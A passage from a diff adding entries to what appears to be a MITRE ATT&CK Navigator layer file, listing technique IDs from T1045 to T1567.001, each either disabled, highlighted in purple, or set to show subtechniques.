{ + "enabled": false, + "techniqueID": "T1045" + }, + { + "color": "#7a34eb", + "techniqueID": "T1046" + }, + { + "enabled": false, + "techniqueID": "T1047" + }, + { + "showSubtechniques": true, + "techniqueID": "T1048" + }, + { + "showSubtechniques": true, + "techniqueID": "T1048" + }, + { + "enabled": false, + "techniqueID": "T1048.001" + }, + { + "enabled": false, + "techniqueID": "T1048.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1048.003" + }, + { + "color": "#7a34eb", + "techniqueID": "T1048.003" + }, + { + "enabled": false, + "techniqueID": "T1049" + }, + { + "enabled": false, + "techniqueID": "T1050" + }, + { + "enabled": false, + "techniqueID": "T1051" + }, + { + "enabled": false, + "techniqueID": "T1052" + }, + { + "enabled": false, + "techniqueID": "T1052.001" + }, + { + "showSubtechniques": true, + "techniqueID": "T1053" + }, + { + "enabled": false, + "techniqueID": "T1053.001" + }, + { + "enabled": false, + "techniqueID": "T1053.002" + }, + { + "enabled": false, + "techniqueID": "T1053.003" + }, + { + "enabled": false, + "techniqueID": "T1053.004" + }, + { + "color": "#7a34eb", + "techniqueID": "T1053.005" + }, + { + "enabled": false, + "techniqueID": "T1053.006" + }, + { + "enabled": false, + "techniqueID": "T1053.007" + }, + { + "enabled": false, + "techniqueID": "T1054" + }, + { + "enabled": false, + "techniqueID": "T1055" + }, + { + "enabled": false, + "techniqueID": "T1055.001" + }, + { + "enabled": false, + "techniqueID": "T1055.002" + }, + { + "enabled": false, + "techniqueID": "T1055.003" + }, + { + "enabled": false, + "techniqueID": "T1055.004" + }, + { + "enabled": false, + "techniqueID": "T1055.005" + }, + { + "enabled": false, + "techniqueID": "T1055.008" + }, + { + "enabled": false, + "techniqueID": "T1055.009" + }, + { + "enabled": false, + "techniqueID": "T1055.011" + }, + { + "enabled": false, + "techniqueID": "T1055.012" + }, + { + "enabled": false, + "techniqueID": "T1055.013" + }, + { + "enabled": false, + "techniqueID": 
"T1055.014" + }, + { + "enabled": false, + "techniqueID": "T1055.015" + }, + { + "showSubtechniques": true, + "techniqueID": "T1056" + }, + { + "color": "#7a34eb", + "techniqueID": "T1056.001" + }, + { + "enabled": false, + "techniqueID": "T1056.002" + }, + { + "enabled": false, + "techniqueID": "T1056.003" + }, + { + "enabled": false, + "techniqueID": "T1056.004" + }, + { + "enabled": false, + "techniqueID": "T1057" + }, + { + "enabled": false, + "techniqueID": "T1058" + }, + { + "enabled": false, + "techniqueID": "T1059" + }, + { + "enabled": false, + "techniqueID": "T1059.001" + }, + { + "enabled": false, + "techniqueID": "T1059.002" + }, + { + "enabled": false, + "techniqueID": "T1059.003" + }, + { + "enabled": false, + "techniqueID": "T1059.004" + }, + { + "enabled": false, + "techniqueID": "T1059.005" + }, + { + "enabled": false, + "techniqueID": "T1059.006" + }, + { + "enabled": false, + "techniqueID": "T1059.007" + }, + { + "enabled": false, + "techniqueID": "T1059.008" + }, + { + "enabled": false, + "techniqueID": "T1059.009" + }, + { + "enabled": false, + "techniqueID": "T1060" + }, + { + "enabled": false, + "techniqueID": "T1061" + }, + { + "enabled": false, + "techniqueID": "T1062" + }, + { + "enabled": false, + "techniqueID": "T1063" + }, + { + "enabled": false, + "techniqueID": "T1064" + }, + { + "enabled": false, + "techniqueID": "T1065" + }, + { + "enabled": false, + "techniqueID": "T1066" + }, + { + "enabled": false, + "techniqueID": "T1067" + }, + { + "enabled": false, + "techniqueID": "T1068" + }, + { + "enabled": false, + "techniqueID": "T1069" + }, + { + "enabled": false, + "techniqueID": "T1069.001" + }, + { + "enabled": false, + "techniqueID": "T1069.002" + }, + { + "enabled": false, + "techniqueID": "T1069.003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1070" + }, + { + "color": "#7a34eb", + "techniqueID": "T1070.001" + }, + { + "enabled": false, + "techniqueID": "T1070.002" + }, + { + "enabled": false, + "techniqueID": 
"T1070.003" + }, + { + "enabled": false, + "techniqueID": "T1070.004" + }, + { + "enabled": false, + "techniqueID": "T1070.005" + }, + { + "enabled": false, + "techniqueID": "T1070.006" + }, + { + "enabled": false, + "techniqueID": "T1070.007" + }, + { + "enabled": false, + "techniqueID": "T1070.008" + }, + { + "enabled": false, + "techniqueID": "T1070.009" + }, + { + "showSubtechniques": true, + "techniqueID": "T1071" + }, + { + "showSubtechniques": true, + "techniqueID": "T1071" + }, + { + "color": "#7a34eb", + "techniqueID": "T1071.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1071.001" + }, + { + "enabled": false, + "techniqueID": "T1071.002" + }, + { + "enabled": false, + "techniqueID": "T1071.003" + }, + { + "enabled": false, + "techniqueID": "T1071.004" + }, + { + "enabled": false, + "techniqueID": "T1072" + }, + { + "enabled": false, + "techniqueID": "T1073" + }, + { + "enabled": false, + "techniqueID": "T1074" + }, + { + "enabled": false, + "techniqueID": "T1074.001" + }, + { + "enabled": false, + "techniqueID": "T1074.002" + }, + { + "enabled": false, + "techniqueID": "T1075" + }, + { + "enabled": false, + "techniqueID": "T1076" + }, + { + "enabled": false, + "techniqueID": "T1077" + }, + { + "color": "#7a34eb", + "techniqueID": "T1078" + }, + { + "color": "#7a34eb", + "techniqueID": "T1078" + }, + { + "enabled": false, + "techniqueID": "T1078.001" + }, + { + "enabled": false, + "techniqueID": "T1078.002" + }, + { + "enabled": false, + "techniqueID": "T1078.003" + }, + { + "enabled": false, + "techniqueID": "T1078.004" + }, + { + "enabled": false, + "techniqueID": "T1079" + }, + { + "enabled": false, + "techniqueID": "T1080" + }, + { + "enabled": false, + "techniqueID": "T1081" + }, + { + "enabled": false, + "techniqueID": "T1082" + }, + { + "enabled": false, + "techniqueID": "T1083" + }, + { + "enabled": false, + "techniqueID": "T1084" + }, + { + "enabled": false, + "techniqueID": "T1085" + }, + { + "enabled": false, + "techniqueID": "T1086" + 
}, + { + "showSubtechniques": true, + "techniqueID": "T1087" + }, + { + "showSubtechniques": true, + "techniqueID": "T1087" + }, + { + "enabled": false, + "techniqueID": "T1087.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1087.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1087.002" + }, + { + "enabled": false, + "techniqueID": "T1087.003" + }, + { + "enabled": false, + "techniqueID": "T1087.004" + }, + { + "enabled": false, + "techniqueID": "T1088" + }, + { + "enabled": false, + "techniqueID": "T1089" + }, + { + "enabled": false, + "techniqueID": "T1090" + }, + { + "enabled": false, + "techniqueID": "T1090.001" + }, + { + "enabled": false, + "techniqueID": "T1090.002" + }, + { + "enabled": false, + "techniqueID": "T1090.003" + }, + { + "enabled": false, + "techniqueID": "T1090.004" + }, + { + "enabled": false, + "techniqueID": "T1091" + }, + { + "enabled": false, + "techniqueID": "T1092" + }, + { + "enabled": false, + "techniqueID": "T1093" + }, + { + "enabled": false, + "techniqueID": "T1094" + }, + { + "enabled": false, + "techniqueID": "T1095" + }, + { + "enabled": false, + "techniqueID": "T1096" + }, + { + "enabled": false, + "techniqueID": "T1097" + }, + { + "showSubtechniques": true, + "techniqueID": "T1098" + }, + { + "enabled": false, + "techniqueID": "T1098.001" + }, + { + "enabled": false, + "techniqueID": "T1098.002" + }, + { + "enabled": false, + "techniqueID": "T1098.003" + }, + { + "enabled": false, + "techniqueID": "T1098.004" + }, + { + "color": "#7a34eb", + "techniqueID": "T1098.005" + }, + { + "enabled": false, + "techniqueID": "T1098.006" + }, + { + "enabled": false, + "techniqueID": "T1099" + }, + { + "enabled": false, + "techniqueID": "T1100" + }, + { + "enabled": false, + "techniqueID": "T1101" + }, + { + "enabled": false, + "techniqueID": "T1102" + }, + { + "enabled": false, + "techniqueID": "T1102.001" + }, + { + "enabled": false, + "techniqueID": "T1102.002" + }, + { + "enabled": false, + "techniqueID": "T1102.003" + }, + 
{ + "enabled": false, + "techniqueID": "T1103" + }, + { + "enabled": false, + "techniqueID": "T1104" + }, + { + "color": "#7a34eb", + "techniqueID": "T1105" + }, + { + "enabled": false, + "techniqueID": "T1106" + }, + { + "enabled": false, + "techniqueID": "T1107" + }, + { + "enabled": false, + "techniqueID": "T1108" + }, + { + "enabled": false, + "techniqueID": "T1109" + }, + { + "enabled": false, + "techniqueID": "T1110" + }, + { + "enabled": false, + "techniqueID": "T1110.001" + }, + { + "enabled": false, + "techniqueID": "T1110.002" + }, + { + "enabled": false, + "techniqueID": "T1110.003" + }, + { + "enabled": false, + "techniqueID": "T1110.004" + }, + { + "enabled": false, + "techniqueID": "T1111" + }, + { + "color": "#7a34eb", + "techniqueID": "T1112" + }, + { + "color": "#7a34eb", + "techniqueID": "T1113" + }, + { + "enabled": false, + "techniqueID": "T1114" + }, + { + "enabled": false, + "techniqueID": "T1114.001" + }, + { + "enabled": false, + "techniqueID": "T1114.002" + }, + { + "enabled": false, + "techniqueID": "T1114.003" + }, + { + "enabled": false, + "techniqueID": "T1115" + }, + { + "enabled": false, + "techniqueID": "T1116" + }, + { + "enabled": false, + "techniqueID": "T1117" + }, + { + "enabled": false, + "techniqueID": "T1118" + }, + { + "enabled": false, + "techniqueID": "T1119" + }, + { + "enabled": false, + "techniqueID": "T1120" + }, + { + "enabled": false, + "techniqueID": "T1121" + }, + { + "enabled": false, + "techniqueID": "T1122" + }, + { + "enabled": false, + "techniqueID": "T1123" + }, + { + "enabled": false, + "techniqueID": "T1124" + }, + { + "enabled": false, + "techniqueID": "T1125" + }, + { + "enabled": false, + "techniqueID": "T1126" + }, + { + "enabled": false, + "techniqueID": "T1127" + }, + { + "enabled": false, + "techniqueID": "T1127.001" + }, + { + "enabled": false, + "techniqueID": "T1128" + }, + { + "enabled": false, + "techniqueID": "T1129" + }, + { + "enabled": false, + "techniqueID": "T1130" + }, + { + "enabled": 
false, + "techniqueID": "T1131" + }, + { + "enabled": false, + "techniqueID": "T1132" + }, + { + "enabled": false, + "techniqueID": "T1132.001" + }, + { + "enabled": false, + "techniqueID": "T1132.002" + }, + { + "enabled": false, + "techniqueID": "T1133" + }, + { + "enabled": false, + "techniqueID": "T1134" + }, + { + "enabled": false, + "techniqueID": "T1134.001" + }, + { + "enabled": false, + "techniqueID": "T1134.002" + }, + { + "enabled": false, + "techniqueID": "T1134.003" + }, + { + "enabled": false, + "techniqueID": "T1134.004" + }, + { + "enabled": false, + "techniqueID": "T1134.005" + }, + { + "enabled": false, + "techniqueID": "T1135" + }, + { + "showSubtechniques": true, + "techniqueID": "T1136" + }, + { + "color": "#7a34eb", + "techniqueID": "T1136.001" + }, + { + "enabled": false, + "techniqueID": "T1136.002" + }, + { + "enabled": false, + "techniqueID": "T1136.003" + }, + { + "enabled": false, + "techniqueID": "T1137" + }, + { + "enabled": false, + "techniqueID": "T1137.001" + }, + { + "enabled": false, + "techniqueID": "T1137.002" + }, + { + "enabled": false, + "techniqueID": "T1137.003" + }, + { + "enabled": false, + "techniqueID": "T1137.004" + }, + { + "enabled": false, + "techniqueID": "T1137.005" + }, + { + "enabled": false, + "techniqueID": "T1137.006" + }, + { + "enabled": false, + "techniqueID": "T1138" + }, + { + "enabled": false, + "techniqueID": "T1139" + }, + { + "enabled": false, + "techniqueID": "T1140" + }, + { + "enabled": false, + "techniqueID": "T1141" + }, + { + "enabled": false, + "techniqueID": "T1142" + }, + { + "enabled": false, + "techniqueID": "T1143" + }, + { + "enabled": false, + "techniqueID": "T1144" + }, + { + "enabled": false, + "techniqueID": "T1145" + }, + { + "enabled": false, + "techniqueID": "T1146" + }, + { + "enabled": false, + "techniqueID": "T1147" + }, + { + "enabled": false, + "techniqueID": "T1148" + }, + { + "enabled": false, + "techniqueID": "T1149" + }, + { + "enabled": false, + "techniqueID": "T1150" + 
}, + { + "enabled": false, + "techniqueID": "T1151" + }, + { + "enabled": false, + "techniqueID": "T1152" + }, + { + "enabled": false, + "techniqueID": "T1153" + }, + { + "enabled": false, + "techniqueID": "T1154" + }, + { + "enabled": false, + "techniqueID": "T1155" + }, + { + "enabled": false, + "techniqueID": "T1156" + }, + { + "enabled": false, + "techniqueID": "T1157" + }, + { + "enabled": false, + "techniqueID": "T1158" + }, + { + "enabled": false, + "techniqueID": "T1159" + }, + { + "enabled": false, + "techniqueID": "T1160" + }, + { + "enabled": false, + "techniqueID": "T1161" + }, + { + "enabled": false, + "techniqueID": "T1162" + }, + { + "enabled": false, + "techniqueID": "T1163" + }, + { + "enabled": false, + "techniqueID": "T1164" + }, + { + "enabled": false, + "techniqueID": "T1165" + }, + { + "enabled": false, + "techniqueID": "T1166" + }, + { + "enabled": false, + "techniqueID": "T1167" + }, + { + "enabled": false, + "techniqueID": "T1168" + }, + { + "enabled": false, + "techniqueID": "T1169" + }, + { + "enabled": false, + "techniqueID": "T1170" + }, + { + "enabled": false, + "techniqueID": "T1171" + }, + { + "enabled": false, + "techniqueID": "T1172" + }, + { + "enabled": false, + "techniqueID": "T1173" + }, + { + "enabled": false, + "techniqueID": "T1174" + }, + { + "enabled": false, + "techniqueID": "T1175" + }, + { + "enabled": false, + "techniqueID": "T1176" + }, + { + "enabled": false, + "techniqueID": "T1177" + }, + { + "enabled": false, + "techniqueID": "T1178" + }, + { + "enabled": false, + "techniqueID": "T1179" + }, + { + "enabled": false, + "techniqueID": "T1180" + }, + { + "enabled": false, + "techniqueID": "T1181" + }, + { + "enabled": false, + "techniqueID": "T1182" + }, + { + "enabled": false, + "techniqueID": "T1183" + }, + { + "enabled": false, + "techniqueID": "T1184" + }, + { + "enabled": false, + "techniqueID": "T1185" + }, + { + "enabled": false, + "techniqueID": "T1186" + }, + { + "enabled": false, + "techniqueID": "T1187" + 
}, + { + "enabled": false, + "techniqueID": "T1188" + }, + { + "enabled": false, + "techniqueID": "T1189" + }, + { + "enabled": false, + "techniqueID": "T1190" + }, + { + "enabled": false, + "techniqueID": "T1191" + }, + { + "enabled": false, + "techniqueID": "T1192" + }, + { + "enabled": false, + "techniqueID": "T1193" + }, + { + "enabled": false, + "techniqueID": "T1194" + }, + { + "enabled": false, + "techniqueID": "T1195" + }, + { + "enabled": false, + "techniqueID": "T1195.001" + }, + { + "enabled": false, + "techniqueID": "T1195.002" + }, + { + "enabled": false, + "techniqueID": "T1195.003" + }, + { + "enabled": false, + "techniqueID": "T1196" + }, + { + "enabled": false, + "techniqueID": "T1197" + }, + { + "enabled": false, + "techniqueID": "T1198" + }, + { + "enabled": false, + "techniqueID": "T1199" + }, + { + "enabled": false, + "techniqueID": "T1200" + }, + { + "enabled": false, + "techniqueID": "T1201" + }, + { + "enabled": false, + "techniqueID": "T1202" + }, + { + "enabled": false, + "techniqueID": "T1203" + }, + { + "enabled": false, + "techniqueID": "T1204" + }, + { + "enabled": false, + "techniqueID": "T1204.001" + }, + { + "enabled": false, + "techniqueID": "T1204.002" + }, + { + "enabled": false, + "techniqueID": "T1204.003" + }, + { + "enabled": false, + "techniqueID": "T1205" + }, + { + "enabled": false, + "techniqueID": "T1205.001" + }, + { + "enabled": false, + "techniqueID": "T1205.002" + }, + { + "enabled": false, + "techniqueID": "T1206" + }, + { + "enabled": false, + "techniqueID": "T1207" + }, + { + "enabled": false, + "techniqueID": "T1208" + }, + { + "enabled": false, + "techniqueID": "T1209" + }, + { + "enabled": false, + "techniqueID": "T1210" + }, + { + "enabled": false, + "techniqueID": "T1211" + }, + { + "enabled": false, + "techniqueID": "T1212" + }, + { + "enabled": false, + "techniqueID": "T1213" + }, + { + "enabled": false, + "techniqueID": "T1213.001" + }, + { + "enabled": false, + "techniqueID": "T1213.002" + }, + { + 
"enabled": false, + "techniqueID": "T1213.003" + }, + { + "enabled": false, + "techniqueID": "T1214" + }, + { + "enabled": false, + "techniqueID": "T1215" + }, + { + "enabled": false, + "techniqueID": "T1216" + }, + { + "enabled": false, + "techniqueID": "T1216.001" + }, + { + "enabled": false, + "techniqueID": "T1217" + }, + { + "showSubtechniques": true, + "techniqueID": "T1218" + }, + { + "enabled": false, + "techniqueID": "T1218.001" + }, + { + "enabled": false, + "techniqueID": "T1218.002" + }, + { + "enabled": false, + "techniqueID": "T1218.003" + }, + { + "enabled": false, + "techniqueID": "T1218.004" + }, + { + "enabled": false, + "techniqueID": "T1218.005" + }, + { + "enabled": false, + "techniqueID": "T1218.007" + }, + { + "enabled": false, + "techniqueID": "T1218.008" + }, + { + "enabled": false, + "techniqueID": "T1218.009" + }, + { + "enabled": false, + "techniqueID": "T1218.010" + }, + { + "color": "#7a34eb", + "techniqueID": "T1218.011" + }, + { + "enabled": false, + "techniqueID": "T1218.012" + }, + { + "enabled": false, + "techniqueID": "T1218.013" + }, + { + "enabled": false, + "techniqueID": "T1218.014" + }, + { + "color": "#7a34eb", + "techniqueID": "T1219" + }, + { + "enabled": false, + "techniqueID": "T1220" + }, + { + "color": "#7a34eb", + "techniqueID": "T1221" + }, + { + "enabled": false, + "techniqueID": "T1222" + }, + { + "enabled": false, + "techniqueID": "T1222.001" + }, + { + "enabled": false, + "techniqueID": "T1222.002" + }, + { + "enabled": false, + "techniqueID": "T1223" + }, + { + "enabled": false, + "techniqueID": "T1480" + }, + { + "enabled": false, + "techniqueID": "T1480.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1482" + }, + { + "enabled": false, + "techniqueID": "T1483" + }, + { + "color": "#7a34eb", + "techniqueID": "T1484" + }, + { + "showSubtechniques": true, + "techniqueID": "T1484" + }, + { + "showSubtechniques": true, + "techniqueID": "T1484" + }, + { + "color": "#7a34eb", + "techniqueID": "T1484.001" + }, 
+ { + "color": "#7a34eb", + "techniqueID": "T1484.002" + }, + { + "enabled": false, + "techniqueID": "T1485" + }, + { + "color": "#7a34eb", + "techniqueID": "T1486" + }, + { + "enabled": false, + "techniqueID": "T1487" + }, + { + "enabled": false, + "techniqueID": "T1488" + }, + { + "enabled": false, + "techniqueID": "T1489" + }, + { + "color": "#7a34eb", + "techniqueID": "T1490" + }, + { + "enabled": false, + "techniqueID": "T1491" + }, + { + "enabled": false, + "techniqueID": "T1491.001" + }, + { + "enabled": false, + "techniqueID": "T1491.002" + }, + { + "enabled": false, + "techniqueID": "T1492" + }, + { + "enabled": false, + "techniqueID": "T1493" + }, + { + "enabled": false, + "techniqueID": "T1494" + }, + { + "enabled": false, + "techniqueID": "T1495" + }, + { + "enabled": false, + "techniqueID": "T1496" + }, + { + "enabled": false, + "techniqueID": "T1497" + }, + { + "enabled": false, + "techniqueID": "T1497.001" + }, + { + "enabled": false, + "techniqueID": "T1497.002" + }, + { + "enabled": false, + "techniqueID": "T1497.003" + }, + { + "enabled": false, + "techniqueID": "T1498" + }, + { + "enabled": false, + "techniqueID": "T1498.001" + }, + { + "enabled": false, + "techniqueID": "T1498.002" + }, + { + "enabled": false, + "techniqueID": "T1499" + }, + { + "enabled": false, + "techniqueID": "T1499.001" + }, + { + "enabled": false, + "techniqueID": "T1499.002" + }, + { + "enabled": false, + "techniqueID": "T1499.003" + }, + { + "enabled": false, + "techniqueID": "T1499.004" + }, + { + "enabled": false, + "techniqueID": "T1500" + }, + { + "enabled": false, + "techniqueID": "T1501" + }, + { + "enabled": false, + "techniqueID": "T1502" + }, + { + "enabled": false, + "techniqueID": "T1503" + }, + { + "enabled": false, + "techniqueID": "T1504" + }, + { + "enabled": false, + "techniqueID": "T1505" + }, + { + "enabled": false, + "techniqueID": "T1505.001" + }, + { + "enabled": false, + "techniqueID": "T1505.002" + }, + { + "enabled": false, + "techniqueID": 
"T1505.003" + }, + { + "enabled": false, + "techniqueID": "T1505.004" + }, + { + "enabled": false, + "techniqueID": "T1505.005" + }, + { + "enabled": false, + "techniqueID": "T1506" + }, + { + "enabled": false, + "techniqueID": "T1514" + }, + { + "enabled": false, + "techniqueID": "T1518" + }, + { + "enabled": false, + "techniqueID": "T1518.001" + }, + { + "enabled": false, + "techniqueID": "T1519" + }, + { + "enabled": false, + "techniqueID": "T1522" + }, + { + "enabled": false, + "techniqueID": "T1525" + }, + { + "enabled": false, + "techniqueID": "T1526" + }, + { + "enabled": false, + "techniqueID": "T1527" + }, + { + "enabled": false, + "techniqueID": "T1528" + }, + { + "enabled": false, + "techniqueID": "T1529" + }, + { + "enabled": false, + "techniqueID": "T1530" + }, + { + "enabled": false, + "techniqueID": "T1531" + }, + { + "enabled": false, + "techniqueID": "T1534" + }, + { + "enabled": false, + "techniqueID": "T1535" + }, + { + "enabled": false, + "techniqueID": "T1536" + }, + { + "enabled": false, + "techniqueID": "T1537" + }, + { + "enabled": false, + "techniqueID": "T1538" + }, + { + "enabled": false, + "techniqueID": "T1539" + }, + { + "enabled": false, + "techniqueID": "T1542" + }, + { + "enabled": false, + "techniqueID": "T1542.001" + }, + { + "enabled": false, + "techniqueID": "T1542.002" + }, + { + "enabled": false, + "techniqueID": "T1542.003" + }, + { + "enabled": false, + "techniqueID": "T1542.004" + }, + { + "enabled": false, + "techniqueID": "T1542.005" + }, + { + "showSubtechniques": true, + "techniqueID": "T1543" + }, + { + "enabled": false, + "techniqueID": "T1543.001" + }, + { + "enabled": false, + "techniqueID": "T1543.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1543.003" + }, + { + "enabled": false, + "techniqueID": "T1543.004" + }, + { + "enabled": false, + "techniqueID": "T1546" + }, + { + "enabled": false, + "techniqueID": "T1546.001" + }, + { + "enabled": false, + "techniqueID": "T1546.002" + }, + { + "enabled": false, + 
"techniqueID": "T1546.003" + }, + { + "enabled": false, + "techniqueID": "T1546.004" + }, + { + "enabled": false, + "techniqueID": "T1546.005" + }, + { + "enabled": false, + "techniqueID": "T1546.006" + }, + { + "enabled": false, + "techniqueID": "T1546.007" + }, + { + "enabled": false, + "techniqueID": "T1546.008" + }, + { + "enabled": false, + "techniqueID": "T1546.009" + }, + { + "enabled": false, + "techniqueID": "T1546.010" + }, + { + "enabled": false, + "techniqueID": "T1546.011" + }, + { + "enabled": false, + "techniqueID": "T1546.012" + }, + { + "enabled": false, + "techniqueID": "T1546.013" + }, + { + "enabled": false, + "techniqueID": "T1546.014" + }, + { + "enabled": false, + "techniqueID": "T1546.015" + }, + { + "enabled": false, + "techniqueID": "T1546.016" + }, + { + "showSubtechniques": true, + "techniqueID": "T1547" + }, + { + "showSubtechniques": true, + "techniqueID": "T1547" + }, + { + "showSubtechniques": true, + "techniqueID": "T1547" + }, + { + "color": "#7a34eb", + "techniqueID": "T1547.001" + }, + { + "enabled": false, + "techniqueID": "T1547.002" + }, + { + "enabled": false, + "techniqueID": "T1547.003" + }, + { + "color": "#7a34eb", + "techniqueID": "T1547.004" + }, + { + "color": "#7a34eb", + "techniqueID": "T1547.005" + }, + { + "enabled": false, + "techniqueID": "T1547.006" + }, + { + "enabled": false, + "techniqueID": "T1547.007" + }, + { + "enabled": false, + "techniqueID": "T1547.008" + }, + { + "enabled": false, + "techniqueID": "T1547.009" + }, + { + "enabled": false, + "techniqueID": "T1547.010" + }, + { + "enabled": false, + "techniqueID": "T1547.011" + }, + { + "enabled": false, + "techniqueID": "T1547.012" + }, + { + "enabled": false, + "techniqueID": "T1547.013" + }, + { + "enabled": false, + "techniqueID": "T1547.014" + }, + { + "enabled": false, + "techniqueID": "T1547.015" + }, + { + "showSubtechniques": true, + "techniqueID": "T1548" + }, + { + "enabled": false, + "techniqueID": "T1548.001" + }, + { + "color": "#7a34eb", + 
"techniqueID": "T1548.002" + }, + { + "enabled": false, + "techniqueID": "T1548.003" + }, + { + "enabled": false, + "techniqueID": "T1548.004" + }, + { + "enabled": false, + "techniqueID": "T1548.005" + }, + { + "enabled": false, + "techniqueID": "T1550" + }, + { + "enabled": false, + "techniqueID": "T1550.001" + }, + { + "enabled": false, + "techniqueID": "T1550.002" + }, + { + "enabled": false, + "techniqueID": "T1550.003" + }, + { + "enabled": false, + "techniqueID": "T1550.004" + }, + { + "enabled": false, + "techniqueID": "T1552" + }, + { + "enabled": false, + "techniqueID": "T1552.001" + }, + { + "enabled": false, + "techniqueID": "T1552.002" + }, + { + "enabled": false, + "techniqueID": "T1552.003" + }, + { + "enabled": false, + "techniqueID": "T1552.004" + }, + { + "enabled": false, + "techniqueID": "T1552.005" + }, + { + "enabled": false, + "techniqueID": "T1552.006" + }, + { + "enabled": false, + "techniqueID": "T1552.007" + }, + { + "enabled": false, + "techniqueID": "T1552.008" + }, + { + "enabled": false, + "techniqueID": "T1553" + }, + { + "enabled": false, + "techniqueID": "T1553.001" + }, + { + "enabled": false, + "techniqueID": "T1553.002" + }, + { + "enabled": false, + "techniqueID": "T1553.003" + }, + { + "enabled": false, + "techniqueID": "T1553.004" + }, + { + "enabled": false, + "techniqueID": "T1553.005" + }, + { + "enabled": false, + "techniqueID": "T1553.006" + }, + { + "enabled": false, + "techniqueID": "T1554" + }, + { + "showSubtechniques": true, + "techniqueID": "T1555" + }, + { + "enabled": false, + "techniqueID": "T1555.001" + }, + { + "enabled": false, + "techniqueID": "T1555.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1555.003" + }, + { + "enabled": false, + "techniqueID": "T1555.004" + }, + { + "enabled": false, + "techniqueID": "T1555.005" + }, + { + "enabled": false, + "techniqueID": "T1555.006" + }, + { + "enabled": false, + "techniqueID": "T1556" + }, + { + "enabled": false, + "techniqueID": "T1556.001" + }, + { + 
"enabled": false, + "techniqueID": "T1556.002" + }, + { + "enabled": false, + "techniqueID": "T1556.003" + }, + { + "enabled": false, + "techniqueID": "T1556.004" + }, + { + "enabled": false, + "techniqueID": "T1556.005" + }, + { + "enabled": false, + "techniqueID": "T1556.006" + }, + { + "enabled": false, + "techniqueID": "T1556.007" + }, + { + "enabled": false, + "techniqueID": "T1556.008" + }, + { + "enabled": false, + "techniqueID": "T1557" + }, + { + "enabled": false, + "techniqueID": "T1557.001" + }, + { + "enabled": false, + "techniqueID": "T1557.002" + }, + { + "enabled": false, + "techniqueID": "T1557.003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1558" + }, + { + "enabled": false, + "techniqueID": "T1558.001" + }, + { + "enabled": false, + "techniqueID": "T1558.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1558.003" + }, + { + "enabled": false, + "techniqueID": "T1558.004" + }, + { + "enabled": false, + "techniqueID": "T1559" + }, + { + "enabled": false, + "techniqueID": "T1559.001" + }, + { + "enabled": false, + "techniqueID": "T1559.002" + }, + { + "enabled": false, + "techniqueID": "T1559.003" + }, + { + "enabled": false, + "techniqueID": "T1560" + }, + { + "enabled": false, + "techniqueID": "T1560.001" + }, + { + "enabled": false, + "techniqueID": "T1560.002" + }, + { + "enabled": false, + "techniqueID": "T1560.003" + }, + { + "enabled": false, + "techniqueID": "T1561" + }, + { + "enabled": false, + "techniqueID": "T1561.001" + }, + { + "enabled": false, + "techniqueID": "T1561.002" + }, + { + "showSubtechniques": true, + "techniqueID": "T1562" + }, + { + "color": "#7a34eb", + "techniqueID": "T1562.001" + }, + { + "enabled": false, + "techniqueID": "T1562.002" + }, + { + "enabled": false, + "techniqueID": "T1562.003" + }, + { + "enabled": false, + "techniqueID": "T1562.004" + }, + { + "enabled": false, + "techniqueID": "T1562.006" + }, + { + "enabled": false, + "techniqueID": "T1562.007" + }, + { + "enabled": false, + 
"techniqueID": "T1562.008" + }, + { + "enabled": false, + "techniqueID": "T1562.009" + }, + { + "enabled": false, + "techniqueID": "T1562.010" + }, + { + "enabled": false, + "techniqueID": "T1562.011" + }, + { + "enabled": false, + "techniqueID": "T1562.012" + }, + { + "enabled": false, + "techniqueID": "T1563" + }, + { + "enabled": false, + "techniqueID": "T1563.001" + }, + { + "enabled": false, + "techniqueID": "T1563.002" + }, + { + "enabled": false, + "techniqueID": "T1564" + }, + { + "enabled": false, + "techniqueID": "T1564.001" + }, + { + "enabled": false, + "techniqueID": "T1564.002" + }, + { + "enabled": false, + "techniqueID": "T1564.003" + }, + { + "enabled": false, + "techniqueID": "T1564.004" + }, + { + "enabled": false, + "techniqueID": "T1564.005" + }, + { + "enabled": false, + "techniqueID": "T1564.006" + }, + { + "enabled": false, + "techniqueID": "T1564.007" + }, + { + "enabled": false, + "techniqueID": "T1564.008" + }, + { + "enabled": false, + "techniqueID": "T1564.009" + }, + { + "enabled": false, + "techniqueID": "T1564.010" + }, + { + "enabled": false, + "techniqueID": "T1564.011" + }, + { + "enabled": false, + "techniqueID": "T1565" + }, + { + "enabled": false, + "techniqueID": "T1565.001" + }, + { + "enabled": false, + "techniqueID": "T1565.002" + }, + { + "enabled": false, + "techniqueID": "T1565.003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1566" + }, + { + "showSubtechniques": true, + "techniqueID": "T1566" + }, + { + "showSubtechniques": true, + "techniqueID": "T1566" + }, + { + "color": "#7a34eb", + "techniqueID": "T1566.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1566.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1566.002" + }, + { + "enabled": false, + "techniqueID": "T1566.003" + }, + { + "enabled": false, + "techniqueID": "T1566.004" + }, + { + "showSubtechniques": true, + "techniqueID": "T1567" + }, + { + "enabled": false, + "techniqueID": "T1567.001" + }, + { + "color": "#7a34eb", + 
